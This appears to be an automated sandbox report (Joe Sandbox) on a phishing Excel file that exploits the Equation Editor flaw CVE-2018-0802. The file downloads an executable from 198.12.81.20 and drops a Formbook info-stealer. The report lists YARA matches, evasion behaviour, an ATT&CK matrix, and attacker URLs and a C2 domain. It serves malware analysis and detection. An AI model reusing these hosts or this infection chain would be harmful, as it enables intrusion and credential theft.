      Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BUSY[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: 2.2.EQNEDT32.EXE.931118.0.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
      Source: 2.3.EQNEDT32.EXE.931118.1.unpack, type: UNPACKEDPEMatched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
      Source: 2.3.EQNEDT32.EXE.931118.1.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
      Source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 2.2.EQNEDT32.EXE.931118.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
      Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403646
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeCode function: 5_2_00B518905_2_00B51890
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeCode function: 5_2_00B596A05_2_00B596A0
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeCode function: 5_2_00B57E885_2_00B57E88
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeCode function: 5_2_00B59C125_2_00B59C12
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeCode function: 5_2_00B5C3BD5_2_00B5C3BD
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeCode function: 5_2_00B5A1845_2_00B5A184
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeCode function: 5_2_00B5B3F15_2_00B5B3F1
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeCode function: 5_2_00110A565_2_00110A56
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and writeJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
      Source: PO 65738963578 Revise Settlement.xlsxVirustotal: Detection: 41%
      Source: PO 65738963578 Revise Settlement.xlsxReversingLabs: Detection: 29%
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeProcess created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrabJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeProcess created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrabJump to behavior
      Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403646
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$PO 65738963578 Revise Settlement.xlsxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR63D1.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@8/16@0/1
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004021AA CoCreateInstance,4_2_004021AA
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,4_2_00404ABB
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: C:\hkxhi\tnjelr\oppx\aef3432ff76843aeb030a76c099018f6\zhseks\qyypcejy\Release\qyypcejy.pdb source: vbc.exe, 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmp, idcqz.exe, 00000005.00000000.964431298.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe, 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe, 00000006.00000000.967212091.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe.4.dr, nswAB85.tmp.4.dr
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeCode function: 5_2_00B52445 push ecx; ret 5_2_00B52458
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BUSY[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\idcqz.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_037903A2 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_037903A2
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

      Boot Survival

      barindex
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeCode function: 5_2_00B51890 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_00B51890
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_5-7812
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 544Thread sleep time: -420000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_5-6913
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405D7A
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004069A4 FindFirstFileW,FindClose,4_2_004069A4
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0040290B FindFirstFileW,4_2_0040290B
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-1613
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-1694
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-1636
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-1593
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-1967
      Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end nodegraph_4-3510
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeAPI call chain: ExitProcess graph end nodegraph_5-6914
      Source: vbc.exe, 00000004.00000002.984898128.0000000000944000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeCode function: 5_2_00B57A95 IsDebuggerPresent,5_2_00B57A95
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeCode function: 5_2_00B5558A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,5_2_00B5558A
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeCode function: 5_2_00B586ED __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,5_2_00B586ED
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0379046B mov edx, dword ptr fs:[00000030h]2_2_0379046B
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeCode function: 5_2_0011061D mov eax, dword ptr fs:[00000030h]5_2_0011061D
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeCode function: 5_2_001106F7 mov eax, dword ptr fs:[00000030h]5_2_001106F7
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeCode function: 5_2_00110736 mov eax, dword ptr fs:[00000030h]5_2_00110736
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeCode function: 5_2_00110772 mov eax, dword ptr fs:[00000030h]5_2_00110772
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeCode function: 5_2_001103F8 mov eax, dword ptr fs:[00000030h]5_2_001103F8
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeCode function: 5_2_00B5439B SetUnhandledExceptionFilter,5_2_00B5439B
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeCode function: 5_2_00B543CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00B543CC
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrabJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeProcess created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrabJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeCode function: 5_2_00B53283 cpuid 5_2_00B53283
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\idcqz.exeCode function: 5_2_00B53EC8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_00B53EC8
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403646

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts1
      Scripting
      Path Interception1
      Access Token Manipulation
      111
      Masquerading
      OS Credential Dumping1
      System Time Discovery
      Remote Services1
      Archive Collected Data
      Exfiltration Over Other Network Medium1
      Encrypted Channel
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      System Shutdown/Reboot
      Default Accounts11
      Native API
      Boot or Logon Initialization Scripts11
      Process Injection
      1
      Virtualization/Sandbox Evasion
      LSASS Memory31
      Security Software Discovery
      Remote Desktop Protocol1
      Clipboard Data
      Exfiltration Over Bluetooth33
      Ingress Tool Transfer
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain Accounts22
      Exploitation for Client Execution
      Logon Script (Windows)Logon Script (Windows)1
      Access Token Manipulation
      Security Account Manager1
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
      Non-Application Layer Protocol
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
      Process Injection
      NTDS1
      Remote System Discovery
      Distributed Component Object ModelInput CaptureScheduled Transfer121
      Application Layer Protocol
      SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Scripting
      LSA Secrets2
      File and Directory Discovery
      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common1
      Obfuscated Files or Information
      Cached Domain Credentials16
      System Information Discovery
      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
      Software Packing
      DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      PO 65738963578 Revise Settlement.xlsx41%VirustotalBrowse
      PO 65738963578 Revise Settlement.xlsx29%ReversingLabsWin32.Exploit.CVE-2018-0802
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BUSY[1].exe100%Joe Sandbox ML
      C:\Users\Public\vbc.exe100%Joe Sandbox ML
      SourceDetectionScannerLabelLinkDownload
      2.3.EQNEDT32.EXE.998472.2.unpack100%AviraTR/Patched.Ren.GenDownload File
      2.3.EQNEDT32.EXE.931118.1.unpack100%AviraTR/Patched.Ren.GenDownload File
      2.3.EQNEDT32.EXE.998472.0.unpack100%AviraTR/Patched.Ren.GenDownload File
      2.2.EQNEDT32.EXE.931118.0.unpack100%AviraTR/Patched.Ren.GenDownload File
      5.2.idcqz.exe.160000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
      No Antivirus matches
      SourceDetectionScannerLabelLink
      www.cortesdisenosroutercnc.com/itq4/100%Avira URL Cloudmalware
      http://198.12.81.20/busy/BUSY.exeC:100%Avira URL Cloudmalware
      http://198.12.81.20/busy/BUSY.exeiiC:100%Avira URL Cloudmalware
      http://198.12.81.20/busy/BUSY.exej100%Avira URL Cloudmalware
      http://198.12.81.20/busy/BUSY.exe100%Avira URL Cloudmalware
      No contacted domains info
      NameMaliciousAntivirus DetectionReputation
      www.cortesdisenosroutercnc.com/itq4/true
      • Avira URL Cloud: malware
      low
      http://198.12.81.20/busy/BUSY.exetrue
      • Avira URL Cloud: malware
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://nsis.sf.net/NSIS_ErrorErrorEQNEDT32.EXE, 00000002.00000003.957494354.0000000000955000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000000.959904121.000000000040A000.00000008.00000001.01000000.00000004.sdmp, BUSY[1].exe.2.dr, vbc.exe.2.drfalse
        high
        http://198.12.81.20/busy/BUSY.exeC:EQNEDT32.EXE, 00000002.00000003.957575421.000000000098D000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        unknown
        http://198.12.81.20/busy/BUSY.exeiiC:EQNEDT32.EXE, 00000002.00000002.961987848.00000000008FF000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        unknown
        http://198.12.81.20/busy/BUSY.exejEQNEDT32.EXE, 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        198.12.81.20
        unknownUnited States
        36352AS-COLOCROSSINGUStrue
        Joe Sandbox Version:34.0.0 Boulder Opal
        Analysis ID:626146
        Start date and time: 13/05/202216:40:442022-05-13 16:40:44 +02:00
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 5m 47s
        Hypervisor based Inspection enabled:false
        Report type:full
        Sample file name:PO 65738963578 Revise Settlement.xlsx
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
        Number of analysed new started processes analysed:7
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal100.troj.expl.evad.winXLSX@8/16@0/1
        EGA Information:
        • Successful, ratio: 100%
        HDC Information:
        • Successful, ratio: 95% (good quality ratio 89.4%)
        • Quality average: 83.1%
        • Quality standard deviation: 27.6%
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 42
        • Number of non-executed functions: 35
        Cookbook Comments:
        • Found application associated with file extension: .xlsx
        • Adjust boot time
        • Enable AMSI
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Scroll down
        • Close Viewer
        • Exclude process from analysis (whitelisted): dllhost.exe
        • Report size getting too big, too many NtCreateFile calls found.
